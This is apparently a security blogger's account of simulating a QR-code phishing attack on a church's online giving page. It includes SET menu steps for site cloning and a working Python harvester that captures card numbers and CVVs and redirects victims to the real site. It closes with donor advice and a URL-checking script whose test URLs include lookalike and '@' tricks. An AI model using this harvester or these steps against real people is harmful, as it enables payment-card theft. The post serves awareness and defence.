Phishing in the Pews: The Hidden Dangers of QR Codes in Church Communities

21 May 2024

There I was, sitting in the pews listening to the morning sermon. It was just a regular Sunday morning, with my wife and me sitting and listening and my daughter trying to wiggle out of my arms. As the sermon drew to a close, I noticed the QR codes taped to the backs of the chairs. The QR codes are there for attendees to learn more about the church and the programs it offers.

You can learn about the church and its members and give to the church. All you need to do is scan the QR code. As a cyber security professional, and someone who is always paranoid, I never scan a QR code, no matter where it is. I know it’s no way to live, but seeing me scan a QR code is like hearing the pope say a curse word.

An idea came to me as we bowed our heads in prayer. What if someone swapped out the church’s QR code with their own malicious QR code and stole credit card information? That is when I decided I was going to “Hack” the church…in theory anyway. “Father forgive me, for I have sinned.”

Understanding QR Codes

What are QR codes? A QR code (short for Quick Response code) is a grid of black and white squares that encodes data for a machine to read. A smartphone camera decodes the arrangement of squares in a fraction of a second, and when the payload is a URL (the usual case), the phone offers to open it in the browser. That convenience is the whole point, and also the whole problem: the person scanning never sees the URL until the page is already loading. Common uses in church settings include digital bulletins, online giving, and event registration.

Phishing Basics

Phishing is a form of social engineering in which an attacker uses email, phone, text, or another channel to get a user to take an action, such as navigating to a fake website and entering credentials or card details there. Whatever the channel, the information collected is then used to gain unauthorized access to protected accounts, money, or data.

How QR Code Phishing Works

QR code phishing works just like any other phishing attack, with two differences that favour the attacker: the link is hidden inside an image, so there is usually no URL to eyeball before scanning, and a printed code can be stuck to anything, anywhere in the world. You find them on your favorite TV shows, in commercials, on news stations, in businesses, and in churches. Why would a church community be an attractive target? It is a trusting environment.

There are often less tech-savvy individuals and a potential for high-value donations. There also isn’t any form of validation on the back of a pew that indicates a QR code is the legitimate one, unless you scan it and find out for yourself. If this scenario is plausible, how would a cybercriminal achieve it? Have your communion juice and crackers; there will be a lot to confess later.

Unholy Intention

If a cybercriminal wanted to conduct a QR code phishing attack on a church, the first step would be reconnaissance and choosing the tactic. In this case, the tactic is a QR code phishing attack that attempts to steal credit card information. To be successful, the attacker would need to research the church and how church members give donations.

To orchestrate the attack, the cybercriminal would do the following:

  • Reconnaissance on how the church receives donations.
  • Clone the church website and the portion for giving.
  • Buy a domain that is similar to the church domain and host it on a VPS environment.
  • Write code to direct the payments to the cybercriminal.
  • Test.
  • Attend church, and place QR codes on the back of the pews.
  • Wait and capture the credit card information.
  • Buy enough grace to get out of HELL….

“Abandon All Hope, Ye Who Enter Here”

After concluding the reconnaissance portion of the attack, the cybercriminal would locate the church’s website and clone it. This persuades church members to proceed after they scan the QR code at church: the idea is to keep them from suspecting that the website they are visiting is malicious. Cloning the actual website helps because we, as humans, seldom look at the URL bar.

To begin the attack, we look to a tool known as the “Social Engineering Toolkit” or “SET.” The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the launch of social-engineer.org and has quickly become a standard tool in a penetration tester’s arsenal. SET was written by David Kennedy (ReL1K) and, with a lot of help from the community, it has incorporated attacks never before seen in an exploitation toolset.

The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

“Social Engineering Toolkit” or “SET”

Cloning a website with SET is easy, but we need to step through a few menus first. Once SET is running, we need the following options:

  • Select option 1 for Social-Engineering Attacks.

  • Select option 2, Website Attack Vectors.

  • Select option 3, Credential Harvester Attack Method.

“Social Engineering Toolkit” menu

The next menu asks which method you want to use to harvest a victim’s credentials. In this example, we will be cloning the church’s website, so choose option 2, Site Cloner.

SET Site cloner

SET first asks for the IP address that the cloned site’s forms should POST back to, which is the address of your own machine (and the address that will later go into the QR code). Once you confirm that you want to clone a website, it then asks for the URL of the site you wish to clone.

SET Site cloner

Once the URL is entered, SET clones the site, starts serving the clone, and prints every POST request it receives back to this terminal. It is now time to navigate to the cloned site.

SET Site cloner
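To make concrete what SET is doing behind those menus, here is an added example of the same mechanism written from scratch in Python. It is my own stand-in, not SET’s code and not anything from the experiment above: it serves a constructed “give” form (a real clone would serve the church’s HTML with the form action rewritten), prints every POSTed field the way the SET terminal does, and then redirects the visitor to the legitimate site so nothing looks wrong. The page HTML, the field names and the `REAL_SITE` address are assumptions, and it binds to loopback only.

```python
"""Minimal credential-harvester stand-in showing what SET does under the hood.

Added example, not SET's code and not the original post's. Serves a
constructed "give" form over plain HTTP on loopback, records every POSTed
field, then bounces the visitor to the legitimate site.
"""
import threading
from http import HTTPStatus
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs

# Constructed stand-in for a cloned giving page. SET would serve the real
# site's HTML, rewritten so that the form POSTs back to the harvester.
CLONED_GIVE_PAGE = b"""<html><body>
<h1>Give</h1>
<form method="post" action="/give">
  Name <input name="name"><br>
  Card <input name="card"><br>
  Exp <input name="exp"> CVV <input name="cvv"><br>
  <button>Give</button>
</form></body></html>"""

REAL_SITE = "https://example.org/give"  # assumed legitimate destination

# Everything harvested lands here; SET prints the same thing to the terminal.
captured: list[dict[str, str]] = []


def parse_form(body: bytes) -> dict[str, str]:
    """Turn an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body.decode("utf-8", "replace")).items()}


class HarvesterHandler(BaseHTTPRequestHandler):
    def log_message(self, *_):  # keep the demo's stdout to the captures only
        pass

    def do_GET(self):
        # Any path gets the clone, so a QR code pointing at "/" is enough.
        self.send_response(HTTPStatus.OK)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(CLONED_GIVE_PAGE)))
        self.end_headers()
        self.wfile.write(CLONED_GIVE_PAGE)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        fields = parse_form(self.rfile.read(length))
        captured.append(fields)
        print(f"[*] POST {self.path} from {self.client_address[0]}: {fields}")
        # Redirect the victim to the real site so the failure is not obvious.
        self.send_response(HTTPStatus.FOUND)
        self.send_header("Location", REAL_SITE)
        self.send_header("Content-Length", "0")
        self.end_headers()


def start_harvester(host: str = "127.0.0.1", port: int = 0) -> ThreadingHTTPServer:
    """Start the listener on a background thread; port 0 picks a free port."""
    server = ThreadingHTTPServer((host, port), HarvesterHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    srv = start_harvester(port=8080)
    host, port = srv.server_address[:2]
    print(f"[*] Harvester listening on http://{host}:{port}/ (Ctrl-C to stop)")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        srv.shutdown()
```

Two details carry over to the real attack. The harvester never needs TLS to read the card number: it is the server the form is submitted to, so it sees every field in the clear regardless of transport. And the 302 to the real site is what keeps the victim from noticing; they land on the genuine page and assume the first submission simply did not take.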

Now it’s time to create the QR code that will send users to our fake website. Many websites on the Internet will generate a QR code for you, but the Social Engineering Toolkit can generate one as well. The process is very easy: from the Social-Engineering Attacks menu, select option 9, QRCode Generator Attack Vector.

QRCode Generator Attack Vector

SET asks for the URL that the QR code should send users to. We give it our own IP address as the URL, since that is where the credential harvester is listening.

SET Site cloner

There are many ways that you can deliver a QR Code, but we are going to stick it on the back of a pew at church and ask for forgiveness later.

Sweating Like a Sinner in Church

I said a prayer as we were sitting in the pews and placed the QR code. It was only for me to scan of course, and we were just testing a theory. I do not need more marks against me to get into the “Pearly gates.” I took a deep breath and scanned the QR code. I was presented with the cloned website that I created.

Cloned website

I then clicked on the give section, and it brought up the input portion for the signup to give to the church.

Input portion of fake website

I slowly entered all the information into the fields and clicked submit. I then waited to see if any information was captured. The capture works because the harvester is the server receiving the form’s POST, so it sees every field the victim types; SET serves the clone over plain HTTP on port 80, with no TLS, which also means the browser shows no padlock for it.

Give section

After waiting just a few moments, I checked my computer to see if any requests had been sent. As I looked down, I could see that the request carrying the credit card details had been captured successfully. The attack worked: a fake QR code pointing at a cloned website.

Captured credit card information

From Sinner to Saint

The attack was alarming to me, but that is because I am a cyber security professional and know how attacks work. The average church member, told by the pastor to scan the QR code if they want to give, wouldn’t question it. That is where the issue with QR codes lies. What can a person who attends church do about QR codes? Allow me to show you to the promised land.

  • Use the church’s official app to give instead of scanning QR codes.

  • Use the actual website to give to the church.

  • If you do scan a QR code, stop and read the address bar before you type anything. The church’s domain should be spelled exactly right, with no extra words, digits standing in for letters, or symbols added to fool you, and it should be a domain name, not a bare IP address like the one in this experiment.

  • If you scan a QR code, always check for anything that looks suspicious. The address bar should show HTTPS (the padlock) before you enter any payment details; bear in mind that HTTPS only proves the connection to the domain shown is encrypted, not that the domain is the church’s. Sometimes a church will use a third party for the transaction, like Stripe or PayPal, so a handoff to one of those is normal, but a payment form on an unfamiliar domain is not.
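The two URL checks in the list above are easy to get wrong under pressure, so here is an added example, not part of the original post, that turns them into code you could run on whatever a QR scanner decoded before opening it: HTTPS present, hostname spelled exactly as the church’s, no bare IP address (which is what the SET harvester in the experiment answered on), no digit-for-letter lookalikes, no church name buried inside some other domain, and no `user@host` trick in the URL. The trusted hostnames (`gracechurch.example`) and the homoglyph table are assumptions for the example.

```python
"""Sanity-check the URL behind a QR code before typing payment details.

Added example, not part of the original post. The trusted hostnames and the
homoglyph table are assumptions; a church would fill in its own.
"""
import ipaddress
from urllib.parse import urlsplit

# Assumed: the only hostnames the congregation should ever be sent to.
TRUSTED_HOSTS = {"gracechurch.example", "www.gracechurch.example"}
# Digit-for-letter swaps that lookalike domains commonly use.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def _is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def check_qr_url(url: str) -> list[str]:
    """Return a list of findings; an empty list means the URL passed."""
    findings: list[str] = []
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()

    if parts.scheme != "https":
        findings.append(f"not HTTPS (scheme is {parts.scheme or 'missing'!r})")
    if not host:
        findings.append("no hostname")
        return findings
    if _is_ip(host):
        # What the SET harvester in the experiment looks like from the victim side.
        findings.append(f"bare IP address {host} instead of a domain")
        return findings
    if host in TRUSTED_HOSTS:
        return findings

    # Untrusted host: explain why it looks wrong rather than just saying "no".
    if "@" in parts.netloc:
        findings.append("credentials in URL; the real host is the part after '@'")
    if host.startswith("xn--") or ".xn--" in host:
        findings.append("punycode (IDN) hostname, possible homoglyph domain")
    deglyphed = host.translate(HOMOGLYPHS)
    for root in sorted({h.removeprefix("www.") for h in TRUSTED_HOSTS}):
        name = root.split(".")[0]  # "gracechurch"
        if deglyphed != host and (deglyphed == root or deglyphed.endswith("." + root)):
            findings.append(f"lookalike of {root} using digit-for-letter swaps")
        elif name in host:
            findings.append(f"contains '{name}' but is not {root}")
        else:
            findings.append(f"unknown host {host}, not {root}")
    return findings


if __name__ == "__main__":
    # Constructed sample payloads a QR code might decode to.
    for candidate in (
        "https://www.gracechurch.example/give",
        "http://10.0.0.5/",
        "https://grac3church.example/give",
        "https://gracechurch-giving.example/",
        "https://gracechurch.example@evil.net/give",
    ):
        print(candidate, "->", check_qr_url(candidate) or ["OK"])
```

The check is deliberately an allow list: anything that is not literally one of the church’s hostnames fails, and the rest of the code only exists to say why. That is the right shape for a giving page, where there is exactly one place the money should go.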

QR codes carry real risks, and convenience usually wins out over security. People enjoy the easy access a QR code brings: scan, then enjoy whatever comes next. What if what comes next comes at the expense of your bank account and ruins your life for a while? As Jesus once said, “I send you out as sheep among wolves.”